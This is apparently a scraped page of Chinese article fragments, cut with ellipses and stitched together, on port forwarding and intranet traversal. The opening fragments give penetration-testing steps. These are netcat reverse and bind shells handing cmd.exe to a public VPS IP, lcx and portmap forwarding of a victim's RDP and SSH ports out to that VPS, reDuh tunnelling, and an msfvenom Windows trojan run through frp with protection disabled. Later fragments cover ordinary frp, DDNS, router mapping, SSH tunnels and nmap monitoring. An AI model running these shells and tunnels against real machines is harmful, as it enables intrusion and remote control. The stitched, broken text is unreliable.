工具使用 反向连接 场景概述: A主机外网 无法访问B内网机器 B内网机器 可以访问A外网机器 A:103.45.99.224(公网vps) ? ? B: 10.211.55.4(内网机器) ? ?...B:内网执行 Nc.exe 103.45.99.224 8787 ? ? 此时A主机公网vps就会收到B内网主机的cmd ? ?...正向连接 场景概述: A内网 可以访问 外网B B外网 不能访问 内网A 在外网B主机上执行nc -l -p 5555 -e cmd.exe ? ?...随后在内网A上执行nc –nvv 103.45.99.224 5555 ? ?...注:如果客户端【相当于内网】连接服务器【相当于外网】,想获取服务器的shell,那么称为正向shell,如果是客户端连接服务器,服务器端想获取客户端的shell,那么称为反向shell,另外有关于nc在
在渗透测试过程中,我们经常会用到端口转发,利用代理脚本将内网的流量代理到本地进行访问,这样极大的方便了我们对内网进行横向渗透。...在没有端口转发的情况下外网主机是不能直接连接内网主机的,但是lcx工具可以将内网主机(出入内网主机的需要能够ping通互联网)的某个端口抓发到外网的某个端口上面,这样的话处于外网的主机可以将映射到外网的端口再反弹到另一个外网的端口上面...故内网已经打通,说实话lcx的工具如同在路由器上面做了端口转发。 ?...127.0.0.1:1234; reDuh端口转发 reDuh也是一款内网渗透利器,这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。...用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。
工具介绍 Lcx是一个端口转发工具,有windows版和linux两个版本(linux版本名为protmap) 前期准备: 公网主机vps:103.45.99.224 受害机内网ip:127.0.0.1...工具使用 Windows 内网主机上执行:lcx.exe -slave 例: 将内网主机(10.211.55.3)的3389端口转发到公网主机...公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 公网vps尝试访问8989端口 ? ? Linux 内网主机上执行: ..../portmap -m 3 -h1 -p1 -h2 -p2 例: 将内网主机(172.17.0.13)的22端口转发到公网主机(103.45.99.224...)的9898端口 ?
工具介绍 Frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。...= admin #HTTP代理端口 vhost_http_port = 10080 #HTTPS代理端口 vhost_https_port = 10443 然后运行....客户端 随后配置客户端编辑客户端配置文件 #服务器地址 server_addr = x.x.x.x #服务器绑定端口 server_port = 7000 #服务器连接密码 token = 12345678...#服务名称(自定义) [ssh] #转发协议类型 type = tcp #本地地址 local_ip = 127.0.0.1 #本地端口 local_port = 22 #远程端口 remote_port...此时frp隧道已经建立成功,可以通过访问vps的ip:7001就相当于访问了本地的22端口
点击上方“蓝字”关注我们 Frp实现端口转发内网穿透 准备工作 1.1 frp是什么 简单地说,frp就是一个反向代理软件,它体积轻量但功能很强大,可以使处于内网或防火墙后的设备对外界提供服务,它支持HTTP...“local_port”是本地应用的端口号,按照实际应用工作在本机的端口号填写即可。 “remote_port”是该条规则在服务端开放的端口号,自己填写并记录即可。...四、Metasploit渗透windows测试 4.1环境 内网kali攻击机 公网vps 链接手机热点的win10电脑 4.2 msfvenom制作Windows木马程序 由于只是测试frp反向代理+...内网穿透+ Metasploit渗透windows,所以这里不提及免杀并且关闭防护软件。...,与frpc中的local_port一致 4.4Windows端运行木马 Windows端运行木马,kali端发现win10主机上线成功,控制win10 至此, 反向代理+内网穿透+ Metasploit
工具 Frp是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。...修改成服务端Ip server_addr = x.x.x.x server_port = 7000 [rdp] type = tcp local_ip = 127.0.0.1 # 修改成RDP协议的端口
当需要从外部网络访问内网服务器资源的时候变得有些麻烦,如果想路由器能进行端口映射,及动态域名配置功能该怎么操作呢?...下面小编就使用固定的域名绑定动态的出口IP,实现从外网访问内网服务器资源,而不用因为动态IP变麻烦。...1、首先登录路由器,使用的是飞鱼星路由器 2、配置端口映射规则 3、安全设置,防止路由器阻挡访问 4、设置端口回流 5、绑定花生壳动态域名(前提是已注册好花生壳,购买了动态域名,免费域名也可以...),使用域名替代动态出口IP访问内网服务器 至此,设置已完成,即可从外网使用花生壳域名 外网端口访问内网服务器了
端口映射:端口映射就是将内网中的主机的一个端口映射到外网主机的一个端口,提供相应的服务。...当用户访问外网IP的这个端口时,服务器自动将请求映射到对应局域网内部的机器上。比如,我们在内网中有一台Web服务器,但是外网中的用户是没有办法直接访问该服务器的。...于是我们可以在路由器上设置一个端口映射,只要外网用户访问路由器ip的80端口,那么路由器会把自动把流量转到内网Web服务器的80端口上。...在这过程中,路由器充当了一个反向代理的作用,他保护了内网中主机的安全 端口转发:端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。...这就要我们的ip地址和路由器的端口进行绑定了,这时,在路由器中就会有一个内网ip和路由器端口对应的一张表。
############################################################# 通过nmap端口扫描获取开放的端口,以达到内网体检的目的 ##########...2、nmap对这个主机列表进行端口扫描 # 注意:刚开始没显式指定端口范围,发现例如27017这些端口都没扫描出来,后来就加了-p 1-65535参数,但是发现扫描特别慢,慎重考虑。...22/tcp open ssh Nmap scan report for node3 (192.168.2.13) 22/tcp open ssh 3、每天执行一次下面的这个脚本,获取最新的开放的端口...,并比对旧的数据,发现端口异动就自动报警。...4、如果确定当前端口是正常流程修改的,可以更新端口列表模板 cp /tmp/list_$(date +%F) /tmp/list 基本上完成这几步骤,就差不多了,还有很多不完善的地方,等想到了在补充进来
,根据不同的端口来判断并指向所需访问的监控设备。 ...,只需要做端口映射即可访问。...29003的服务,em1网卡为内网,服务器网卡1口与公司企业级路由器相连,企业级路由器与运营商网关/光猫相连(运营商网关/光猫为动态IP),要想通过外网来访问到我们公司内网服务器上的服务,要么使用内网穿透...WAN网接口 在这里插入图片描述 6.使用TP-LINK路由器中的DDNS动态域名访问内网服务器上的服务 在这里插入图片描述 可以看到我直接使用刚才设置的DDNS动态域名加上内网服务器服务的端口...29003,直接就能够访问到我们内网服务器上的服务了。
简单记录一下frp的部署和基本用法,主要是因为今天自己切实享受到了frp带来的便利= = 我说我第一次用frp可能很多人都不相信,因为很久以前都是用3322动态域名/花生壳这类东西,真的是暴露年龄的玩意啊...type = tcp local_ip = 127.0.0.1 local_port = 3210 remote_port = 12316 这个配置文件的含义是,当我们访问服务器的公网IP+12316端口就相当于访问我们本地电脑的...3210端口。...至此,frp的配置就大功告成了,我们现在成功的把内网的3210端口暴露给了外网。
FRP内网穿透应用场景:本地Web服务外网访问、本地开发微信、本地联调支付宝\微信支付、TCP/UDP端口转发 在本机开发好的网站想让客户测试不在需要上传到服务器上面,使用FRP内外网穿透轻松解决;微信开发也不需要在上传到服务器...,使用免费FRP内网穿透服务器帮您解决80端口问题,实现微信服务器直接访问到您本机web服务。...使用frp作为内网穿透的时候,有时候,我们需要多个端口穿透,怎么配置呢? FRP内内网穿透应用场景 思考: 我们知道frp要想内网穿透,需要配置服务端和客户端。...如果需要直接访问80端口的话,需要还需要在nginx做配置。...在Proxies菜单下,点击TCP,可以看到对应的端口。如下图所示: frp管理界面查看启动的三个不同端口
使用frp作为内网穿透的时候,有时候,我们需要多个端口穿透,怎么配置呢? 思考: 我们知道frp要想内网穿透,需要配置服务端和客户端。如果需要直接访问80端口的话,需要还需要在nginx做配置。...#端口8079是博客管理后台的项目 [tcp_blog-admin] type = tcp local_port = 8079 listen_port = 8079 #端口8080是博客前台项目访问地址...$ { expires 1d; } } # 端口8079映射到80端口 server { listen 80; server_name blog-admin.mmmm.com...$ { expires 1d; } } # 端口8082映射到80端口 server { listen 80; server_name app3.nnn.com...在Proxies菜单下,点击TCP,可以看到对应的端口。如下图所示:
我们局域网的机器能够访问外网,但是外网不能访问内网。因为内网访问互联网时候能确定外网的地址,外网却不能确定我们局域网内的具体地址。...(ip地址有限)如果 我们在访问外网的时候,这个链接让他保持、不断,那么这个链接就相当于我们建了一条路,内网数据能出去,外网数据能进来,ssh也是这个方法。...:ssh -NTf -R 8888:127.0.0.1:8080 root@host 3、参数说明 -C 允许压缩数据 -f 后台运行 -N 表示只连接远程主机,不打开远程shell -R 将端口绑定到远程服务器...,反向代理 -L 将端口绑定到本地客户端,正向代理 -T 不为这个连接分配TTY -NT 代表这个SSH连接只用来传数据,不执行远程操作 保持ssh链接不断开 通常我们使用ssh 链接服务器的时候...remote-port> user@host done 保证断开后立马就能连上把-f参数去掉 否则就死循环了 方法四、使用autossh 需要下载autossh软件,操作和直接使用ssh 差不多 -M是监听端口
做动态域名解析后,主机IP绑定到小明自己的域名,一旦IP地址发生变化,更新域名解析内容,他依旧可以通过域名访问到FTP服务器。 2....阿杰办理了电信宽带后幸运地发现,获得的IP可以从外网直接访问(之所以说他幸运,是因为现在IPV4资源紧张,宽带运营商都是做了一层NAT再后在给用户分配内网IP,很多人实际公用一个出口IP. )。...答:本身不能实现端口映射,因此如果主机在NAT网络内部,而你又没有权限在路由器上设置端口映射,那么DDNS就无解了,需要做反向代理或者端口穿透。 怎么做?...根据能力和预算有不同的做法: 不差钱可以直接去花生壳购买动态域名服务,随便还能提供内网穿透的功能; 自己折腾可以使用DNSPod + 个人域名 + ArDNSPod脚本....是利用DNSPod实现动态解析的项目,github地址:ArDNSPod https://github.com/anrip/ArDNSPod 笔者重新作了一些修改,可以选择要解析的IP类型,包括外网,内网
内网穿透的技术有很多,常用的方法有: ssh/autossh ngfork frp (本文将介绍该方法) github地址:https://github.com/fatedier/frp frp为传统的...C/S结构,可分为客户端和服务端,其中 frpc(客户端) 运行在内网环境 frps(服务端)运行在有公网IP的服务器 image.png 编写frpc.ini文件,例如: [common] server_addr...= 公网IP server_port = frps运行的端口 token = 一串随机字符用来防止未经授权的使用 [appName] type = tcp local_ip = 127.0.0.1...local_port = 需要映射的本地端口 remote_port = 映射成公网服务器的端口 服务器端frps.ini就更简单了 [common] bind_port = 服务端运行的端口...)把本机的80端口映射成了38888端口,则链路如下 192.168.1.5:80 1.2.3.4:34567 1.2.3.4:38888 提高映射服务可靠性 请使用supervisor
内网穿透能干嘛: 穿透后,你的机器指定端口就直接暴露在外网上,3389,vnc,web服务等等任何服务都可以支持。微信开发需要回调web服务器接口,如果开发机器在内网,就无法调试。...原理 外网服务器A,内网服务器B,通过某种协议连接,将域名解析到A,A将所有用户请求数据转发到B的指定端口,B返回的数据通过A转给用户,等于在B和用户之间加了代理A 解决方案 内网穿透有现成的商业解决方案...今天我们讨论的是在自己的VPS上架设ngrok服务,访问内网的web服务,场景是这台vps上同时开了着web服务(nginx),所以不能直接将80端口作为ngrok的转发端口, ngrok配置成功后,需要在...nginx上作一次转发,才能使用80端口。...,https 444端口,所有访问到外网服务器8888和444端口的数据都会经过ngrok处理转发。
配置动态域名映射(DHCP) 注: 什么是动态域名映射? 在这里大猫简单解释什么是动态域名映射。...这时我们就需要动态域名映射了。...我们接着打开花生壳,点击“内网穿透”: ? 然后按照下面进行设置: ? 需要注意的是,内网端口号必须是12800,这是因为MLS的web node的默认端口号就是这个。...除非我们手动修改过web node的端口号(不建议修改),否则只需输入12800即可。 花生壳会分配给我们一个免费的动态域名和随机端口号,有了这两个东西,我们就可以实现内网穿透啦!...在下图中小伙伴们可以看到大猫获得的这个动态域名和端口是v18700400k.iask.in:27436。其中冒号前的是域名,后面的是端口号: ? 注:详细内网穿透的教程可以参考花生壳官网。 7.
公网和内网的地址映射关系 Holer Access Key Domain Name Internet Address Local Address HOLER_CLIENT-2F8D8B78B3C2A0AE...6060、600以及端口映射规则所涉及的端口; (6) 建议申请域名并且完成域名备案,如果没有域名可以直接使用IP和端口访问。...创建端口映射 2.3.1....创建客户端和端口映射 在用户列表页面中创建一个Holer客户端 http://holer.your-domain.com/view/holer-client.html [Holer Client] 在端口映射页面中为该...,严格按照详情信息里的使用说明进行操作,这样即可完成Holer客户端配置,从而实现基于自己Holer服务端的端口映射功能。
前言-内网穿透 内网穿透是指通过一种技术让外部网络可以访问到内网的NAS设备,这样即使在不同网络环境下,也能够远程访问和管理NAS设备。...Synology的DDNS服务 Synology NAS支持使用DDNS(动态域名解析)服务,可以为NAS设备设置一个动态域名,使用户可以通过域名访问NAS,而不必担心动态IP地址变化带来的问题。...端口转发/端口映射 在路由器上设置端口转发(或称端口映射),将指定端口的流量转发到NAS设备上,这样用户就可以通过特定端口来访问NAS。但要确保端口转发时考虑到安全性,避免暴露不必要的服务或端口。...第三方内网穿透服务 使用类似于ngrok、frp、ZeroTier等第三方工具或服务进行内网穿透,这些服务可以帮助用户将内网设备暴露到公网上,但需要注意安全性和隐私保护。...这篇文章就来介绍ZeroTier实现内网穿透,ZeroTier异地组网是一个非常不错的内网穿透方式,特点就是免费,不限流。
领取专属 10元无门槛券
手把手带您无忧上云